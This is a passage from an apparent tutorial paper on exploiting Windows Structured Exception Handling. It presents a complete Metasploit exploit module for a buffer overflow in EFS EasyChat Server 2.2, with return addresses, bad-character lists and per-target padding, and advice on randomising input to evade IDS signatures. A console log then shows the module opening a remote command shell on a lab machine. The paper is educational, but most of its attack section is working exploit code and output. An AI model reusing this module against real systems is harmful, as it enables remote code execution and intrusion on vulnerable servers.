While we could maintain a script for each flavor of Windows for our exploit, it actually makes more sense to create an exploit module for a tool that already is designed to provide flexible functionality like this. We have already talked about how the Metasploit project provides shellcode and an Opcode database, but it also provides a free framework for developing and executing exploit code against a remote target machine as a means to study security vulnerabilities, facilitate application penetration testing, and aid in IDS (Intrusion Detection System) signature development.

The wonderful aspect of using something like Metasploit is that we can concentrate solely on the exploit design and not worry about the payload itself. In our script, we used a payload to pop up the Windows calc.exe to prove our exploit worked. By using Metasploit we can take advantage of already built payloads to perform more advanced tasks. For example, we could use the windows/shell/reverse_tcp payload to open a command prompt on the target host from the attacker host. We could easily swap this to use the windows/vncinject/bind_tcp payload which will provide us with a GUI interface on the target host from the attacker host. You can see how going from proof of concept exploit code using Windows calc.exe can be quickly transformed into a fully functional powerful exploit.

Due to some limitations with the Windows version of Metasploit, I chose to implement the exploit module using Framework 3.2 on Ubuntu 8.04 LTS Desktop. There is a fair amount of pre-installation that needs to occur on Ubuntu before Metasploit will function correctly. I used the two links below to assist in this initial setup:

http://trac.metasploit.com/wiki/Metasploit3/InstallUbuntu

https://help.ubuntu.com/community/RubyOnRails


The Metasploit team did a great job of documenting how to use the framework for already existing exploits and payloads in the user guide. There is also a development guide which at a high level covers how to write a custom exploit module among other things. Unfortunately, there is not a lot of detailed information in the development guide which covers specific components of the exploit module such as all of the options for the various fields and what the fields are all used for. At the time of this writing, the Metasploit team is supposedly working to create a book which will hopefully include this detailed information. We should appreciate all the hard work the team has put into providing this free tool and the documentation that we have thus far. However, until the detailed information is formally documented, we will need to rely on existing exploits and what little information is publicly available to write our custom exploit module.

Since we know that this exploit makes a HTTP connection and operates on a Windows host, we can begin by looking at other exploit modules located in the following directory:

framework-3.2/modules/exploits/windows/http

There are several working exploits in that directory which we can use as models to build our exploit module. Let's create a new file in this directory and call it efs_easychat.rb. This will be the new Ruby exploit module that we will use. Below is the completed module that we will write. We will talk about each section of the module in some detail, but we will not go into detail about the Ruby syntax in this paper since that is all readily accessible in books and on-line. Since the detailed Metasploit documentation is not available, the information provided here is mainly speculative and should not be taken as complete fact.

##
# $Id$
##
##

require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Seh

def initialize(info = {})

super(update_info(info,

'Name' => 'EFS EasyChat Server Authentication SEH Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in EFS EasyChat Server 2.2.
By sending a overly long authentication request, an attacker may
execute arbitrary code.
},
'Author' => [ 'Donny Hubener' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 1 $',
'References' =>

[

[ 'BID', '33976'],
[ 'CVE', '2004-2466'],

],

'DefaultOptions' =>

{
'EXITFUNC' => 'process',
},

'Privileged' => true,
'Payload' =>
{

'Space' => 800,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
'StackAdjustment' => -3500,

},
'Platform' => 'win',
'Targets' =>

[

['EasyChat Server 2.2 on WinXPSP1 English',

{
'Ret' => 0x1001b1db # universal pop/pop/ret
}

],
['EasyChat Server 2.2 on WinXPSP2 English',

{
'Ret' => 0x1001b1db # universal pop/pop/ret
}

],
['EasyChat Server 2.2 on WinXPSP3 English',

{
'Ret' => 0x1001b1db # universal pop/pop/ret
}

],
],

'DisclosureDate' => 'Aug 14 2007',
'DefaultTarget' => 0))

register_options([Opt::RPORT(80)], self.class)

end

def check

res = send_request_raw
if res and res['Server'] =~ /Easy Chat Server\/1.0/

return Exploit::CheckCode::Appears

end
return Exploit::CheckCode::Safe

end

def exploit

# check target to adjust initial buffer padding
if target.name == 'EasyChat Server 2.2 on WinXPSP1 English'

bufpad = 216

elsif target.name == 'EasyChat Server 2.2 on WinXPSP2 English'

bufpad = 218

elsif target.name == 'EasyChat Server 2.2 on WinXPSP3 English'

bufpad = 216

else

bufpad = 216

end

# create initial buffer pad with random alpha text
initbuf = rand_text_alpha(bufpad)

# create SEH payload
seh = generate_seh_payload(target.ret)

# create buffer to be useded as username field
bigbuf = initbuf + seh

# create password with random alpha text
randpass = rand_text_alpha(rand(20)+1)

# create complete uri string to send
uri = "/chat.ghp?username=#{bigbuf}&password=#{randpass}&room=1&sex=2"

print_status("Trying target #{target.name}...")
send_request_raw({'uri' => uri}, 5)

handler
disconnect

end

end

The first few lines of code tell the framework that we will be using a remote exploit with the SEH and HttpClient supporting methods. Most of the fields under the initialize section are fairly self explanatory such as Name, Description, Author, etc. However, under Payload, we can set the maximum size of the payload with the Space field. In our case we have set this to 800 bytes, but this can be adjusted to be a different value. Additionally, there is a BadChars field which lists several hexadecimal characters which should not be included in the buffer to avoid issues. Notice the first character is 00 which we learned earlier needed to be removed due to it representing a null terminator for a string. Many of the other hex characters listed have special meanings as well which is why they too should be avoided.

While still under the initialize section, we also define our targets. We have made three targets including English versions of Windows SP1, SP2, and SP3. The Ret field of each of these is assigned the universal pop/pop/ret address we found in the EasyChat module. If we did not have a universal address, we could specify a different address for each target assuming the address is functional in that version of Windows.

The next major section is a check section. This is code that will attempt to see if the target is actually vulnerable. In our case, we perform a raw HTTP request and inspect the response. EasyChat was nice enough to populate the Server field in the response with "Easy Chat Server/1.0" which we can use to at least indicate that EasyChat is present. Since we know that we have version 2.2 installed, this may not be a good mechanism to tell us for sure that our exploit will function properly, but it will at least indicate that a version of EasyChat is running and may be vulnerable.

The final major section called exploit is used to actually run the attack. Since we know we need to adjust the initial padding depending on the Windows service pack release, we write a simple if/else sequence to check for which target name was selected and adjust accordingly. We then create the initial buffer with random alpha text which makes it much more difficult for an IDS/IPS device to build a signature that could be used to detect our exploit attempt. Next we create the SEH payload by using the Metasploit function generate_seh_payload. This is a handy function which is smart enough to understand how SEH exploits work and is able to create the buffer to include the short jump opcode, pop/pop/ret address, and stage2 payload shellcode. All that is left is to combine the initial buffer of random alpha text with the result of this function and we have the complete buffer that we use for the username.

Before actually sending the uri exploit, we do also create a random password of alpha characters up to a maximum of 20 characters. Again, this is an attempt to make it more difficult to construct an IDS/IPS signature. Once this is complete, we now send the raw request and exit gracefully.

Running the Metasploit Exploit Module

At stated previously, there is good documentation available on how to run the exploit using Metasploit out at there site. The following output shows an example of the exploit we just created in use.

tester@tester-desktop:~/metasploit/framework-3.2$ ./msfconsole

=[ msf v3.2-release
+ -- --=[ 320 exploits - 217 payloads
+ -- --=[ 20 encoders - 6 nops
=[ 99 aux

msf > use windows/http/efs_easychat
msf exploit(efs_easychat) > set RHOST 10.10.10.193
RHOST => 10.10.10.193
msf exploit(efs_easychat) > show targets

Exploit targets:

Id Name
-- ----
0 EasyChat Server 2.2 on WinXPSP1 English
1 EasyChat Server 2.2 on WinXPSP2 English
2 EasyChat Server 2.2 on WinXPSP3 English

msf exploit(efs_easychat) > set TARGET 1
TARGET => 1
msf exploit(efs_easychat) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(efs_easychat) > set LHOST 10.10.10.206
LHOST => 10.10.10.206
msf exploit(efs_easychat) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no Use a proxy chain
RHOST 10.10.10.193 yes The target address
RPORT 80 yes The target port
SSL false no Use SSL
VHOST no HTTP server virtual host

Payload options (windows/shell/bind_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST 10.10.10.193 no The target address

Exploit target:

Id Name
-- ----
1 EasyChat Server 2.2 on WinXPSP2 English

msf exploit(efs_easychat) > check
[*] The target appears to be vulnerable.
msf exploit(efs_easychat) > exploit

[*] Trying target EasyChat Server 2.2 on WinXPSP2 English...
[*] Started bind handler
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (10.10.10.206:45076 -> 10.10.10.193:4444)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Tester\Desktop>cd \data
cd \data

C:\Data>dir
dir
Volume in drive C has no label.
Volume Serial Number is 70C8-E884

Directory of C:\Data

07/01/2009 10:31 AM <DIR> .
07/01/2009 10:31 AM <DIR> ..
06/25/2009 12:48 PM <DIR> Apps
07/01/2009 10:31 AM 33 target_sp2.txt
06/09/2009 07:48 PM <DIR> Temp
1 File(s) 33 bytes
4 Dir(s) 3,782,705,152 bytes free

C:\Data>

We can see that the exploit worked successfully.

Conculsion

The goal of this paper was to provide an understanding of how the Windows Structured Exception Handler behaves and how it can be exploited. Combining the theory with a walk-through of a real world exploit helps to solidify the concepts. Using Metasploit as an exploit design tool attempts to illustrate how quickly a proof of concept exploit can be transformed into a powerful attack mechanism.

References

Miller, Matt. "Preventing the Exploitation of SEH Overwrites". Sept. 2006.

Scambray, Joel. Hacking Exposed Windows: Microsoft Windows Security Secrets and Solutions, Third Edition. McGraw-Hill Osborne Media. December 4, 2007.